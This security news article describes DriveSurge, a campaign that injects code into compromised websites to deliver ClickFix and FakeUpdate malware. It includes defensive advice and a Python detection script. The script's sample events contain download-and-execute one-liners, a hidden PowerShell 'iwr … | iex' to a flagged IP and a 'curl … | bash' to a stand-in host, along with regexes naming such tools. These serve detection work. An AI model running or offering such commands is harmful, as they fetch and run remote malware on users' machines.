
DriveSurge Operation Compromises Thousands of Sites for ClickFix and FakeUpdate Delivery

Security researchers have identified an industrialized operation known as DriveSurge that compromises legitimate websites to distribute unauthorized software. Organizations can protect their environments by monitoring outbound traffic, evaluating JavaScript configurations, and educating users on social engineering tactics.

Triage Security Media Team

Threat actors have compromised thousands of websites to run industrialized ClickFix and FakeUpdate campaigns in an organized operation aimed at selling initial access to victim systems. The campaign targets Windows and macOS environments and reflects a mature cybercriminal ecosystem that operated undetected for months before it was identified.

Researchers at Silent Push discovered the activity, which they refer to as DriveSurge. The operation appears to function as an initial access broker (IAB), utilizing a pay-per-install (PPI) model to supply downstream threat actors with high-quality leads.

The operation's primary mechanism is a traffic distribution system (TDS), specifically an open-source TDS called zTDS that has been publicly available since at least 2015 and serves as the engine for this activity. When a user visits a compromised website, injected code sends the visitor through zTDS domains, which route the traffic toward ClickFix and FakeUpdate pages. According to the research report, DriveSurge silently redirects visitors to malicious code without the knowledge of the site owners or the affected users.

Targeted code delivery

The infrastructure supporting DriveSurge is extensive. It includes code repositories, PowerShell downloaders, staging servers, and multiple fallback domains configured to maintain resiliency if parts of the network are taken offline. The threat actors evade detection using obfuscated JavaScript encoded in Base64, dynamic URL construction, and failover logic to retrieve unauthorized code.

A notable aspect of the operation involves an obfuscated script hosted on their infrastructure that performs extensive environment profiling. The malicious software collects information about the target system, identifies operating system characteristics, communicates with endpoints controlled by the threat actor, and dynamically constructs code based on the platform.

Waseem Ahmed, head of engineering for Secure.com, notes that while ClickFix and fake-update prompts are established methods for gaining initial access, DriveSurge stands out due to its scale and organizational structure. He describes the operation as a group operating quietly across thousands of compromised but legitimate sites, functioning less like direct intruders and more like an enterprise selling access to other unauthorized parties.

Silent Push emphasizes the sophisticated nature of the campaign, noting that one of the associated malicious websites has been active since at least September 2025, though researchers only identified the broader DriveSurge operation this past February. The report attributes the operation's significance not just to its volume, but to the complexity of its infrastructure, the breadth of its targets, and the fact that it operated largely undetected until now.

How the campaign operates

The sequence begins when a user visits a legitimate website, such as a business, professional services firm, or local organization, that has been compromised. Hidden code injected by DriveSurge routes the visitor through the zTDS layer, which profiles the environment and determines the next step.

The affected party typically encounters one of two scenarios. The first is a FakeUpdate browser prompt, designed to impersonate major browsers including Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser. The prompt encourages the user to download a file presented as a legitimate update, which actually contains malicious software.

The second scenario involves a ClickFix social engineering technique. The user sees a simulated error message instructing them to copy and paste a "fix" into their terminal or PowerShell window. Running that command retrieves and installs the malware directly on the system, with the user doing the work that a browser exploit would otherwise have to do.

Silent Push researchers documented examples of both methods. They observed a FakeUpdate campaign on the compromised site jclforwarding[.]com, where the domain check[.]first-node[.]rocks served a simulated Mozilla Firefox update page. Clicking the prompt triggered a zip file download containing several DLLs and an executable named "Browser Update[.]exe." The researchers also observed a ClickFix sequence attempting to retrieve malicious code from IP 91.92.240[.]127, an address previously flagged on Silent Push's Bulletproof Hosting Indicators of Future Attack (IOFA) feeds.

Addressing ClickFix campaigns

DriveSurge combines industrialized IAB operations with ClickFix techniques, successfully bypassing many automated browser protections by convincing users to execute commands manually. The campaign also demonstrates the increasing frequency of macOS targeting, a platform historically subjected to fewer initial access attempts of this kind than Windows systems.

To strengthen defenses, organizations should complement automated protections by addressing these convincing social engineering tactics. Jason Soroko, senior fellow at Sectigo, recommends that security teams ingest real-time threat intelligence feeds to block associated domains. He also advises prioritizing user education so employees can recognize simulated error prompts and know never to paste unfamiliar commands into a system dialog.

Security teams should also monitor for specific operational indicators. According to Silent Push, these include:

  • Unexpected outbound traffic to newly registered or low-reputation domains.

  • Browser update prompts originating from non-vendor domains.

  • Users executing Terminal, PowerShell, or shell commands copied directly from websites.
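The three indicators above translate directly into detection logic. The script below is an added example written for this article, not Silent Push's detection content: it triages a handful of constructed endpoint process-creation events and web-proxy events, flagging download-and-execute one-liners launched from a GUI parent (a pasted ClickFix "fix"), browser-update packages fetched from a domain that is not a browser vendor, and outbound requests to newly registered domains. The event schema, the vendor allowlist, the regular expressions and the sample events are assumptions for the demo; the only values taken from the article are the IP 91.92.240.127 and the host check.first-node.rocks, and the paths attached to them are made up.

```python
"""Triage constructed endpoint and proxy events for ClickFix / FakeUpdate indicators.

Added example for this article, not Silent Push's detection logic. The event
schema, allowlist, regexes and sample events are assumptions made for the demo.
"""
import re
from urllib.parse import urlparse, unquote

# Assumed allowlist of registrable domains that legitimately serve browser updates.
VENDOR_UPDATE_DOMAINS = {
    "google.com", "gstatic.com", "mozilla.org", "mozilla.net", "microsoft.com",
    "apple.com", "opera.com", "brave.com", "vivaldi.com", "yandex.ru",
}

# A pasted ClickFix "fix" looks like a shell started from a GUI parent that runs
# a download-and-execute one-liner, frequently with a hidden window.
GUI_PARENTS = {"explorer.exe", "windowsterminal.exe", "terminal", "finder"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "zsh", "sh"}
DOWNLOAD_RE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|mshta|certutil|bitsadmin)\b"
    r"|downloadstring|net\.webclient", re.I)
EXEC_RE = re.compile(r"\|\s*iex\b|invoke-expression|\|\s*(ba)?sh\b|\s-e(c|nc|ncodedcommand)?\s", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
# Filenames that imitate a browser update package (assumed heuristic).
UPDATE_ARTIFACT_RE = re.compile(
    r"(update|chrome|firefox|edge|safari|opera|brave).*\.(exe|msi|zip|dmg|pkg)$", re.I)


def registrable_domain(host):
    """Naive eTLD+1: last two labels. Good enough for the demo; use a PSL library in production."""
    if re.fullmatch(r"[\d.]+", host):
        return host  # bare IPv4 literal, keep as-is
    return ".".join(host.lower().split(".")[-2:])


def check_process_event(ev):
    """Return the reasons a process-creation event looks like a pasted ClickFix command."""
    cmd = ev["cmdline"]
    if not (DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd)):
        return []  # ordinary scripting, nothing to report
    reasons = ["download-and-execute one-liner"]
    if ev["image"].lower() in SHELLS and ev["parent"].lower() in GUI_PARENTS:
        reasons.append("shell launched from a GUI parent (typed or pasted by a user)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden console window")
    return reasons


def check_proxy_event(ev, young_domain_days=30):
    """Return the reasons an outbound web request matches the FakeUpdate indicators."""
    reasons = []
    url = urlparse(ev["url"])
    domain = registrable_domain(url.hostname or "")
    if UPDATE_ARTIFACT_RE.search(unquote(url.path)) and domain not in VENDOR_UPDATE_DOMAINS:
        reasons.append(f"browser-update package fetched from non-vendor domain {domain}")
    age = ev.get("domain_age_days")
    if age is not None and age < young_domain_days:
        reasons.append(f"outbound request to newly registered domain {domain} ({age} days old)")
    return reasons


def triage(events):
    """Run the right check for each event and return the ones that produced reasons."""
    alerts = []
    for ev in events:
        reasons = check_process_event(ev) if ev["type"] == "process" else check_proxy_event(ev)
        if reasons:
            alerts.append({"id": ev["id"], "user": ev["user"], "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry). Events 1, 3 and 5 should fire.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://91.92.240.127/x.txt | iex"'},
    {"id": 2, "type": "process", "user": "svc-backup", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"id": 3, "type": "proxy", "user": "bob", "domain_age_days": 12,
     "url": "https://check.first-node.rocks/firefox/Browser%20Update.zip"},
    {"id": 4, "type": "proxy", "user": "bob", "domain_age_days": 9000,
     "url": "https://download.mozilla.org/?product=firefox-latest"},
    {"id": 5, "type": "process", "user": "carol", "parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "curl -s http://fallback-host.test/fix.sh | bash"'},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["id"], alert["user"], "; ".join(alert["reasons"]))
```

In a real deployment the process check would read Sysmon Event ID 1 or EDR process-start telemetry and the proxy check would join the destination against a domain-age or reputation feed; the point of the example is that a pasted ClickFix command and a FakeUpdate download each leave a distinctive combination of signals rather than any single one.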

Detecting suspicious JavaScript injections on externally facing web servers, alongside monitoring indicators of compromise associated with zTDS infrastructure and ClickFix delivery chains, can further assist in identifying and mitigating this activity.

About the author

Elizabeth Montalbano is a contributing writer, freelance editor, and journalist with 30 years of professional experience and a master's degree from Arizona State University. Her expertise spans enterprise technology, cybersecurity, business, and culture. She has worked as a full-time journalist in Phoenix, San Francisco, and New York City, specializing in news coverage and analysis of cybersecurity. She currently resides in Portugal, where she enjoys surfing, hiking, cultivating plants, and performing as a musician.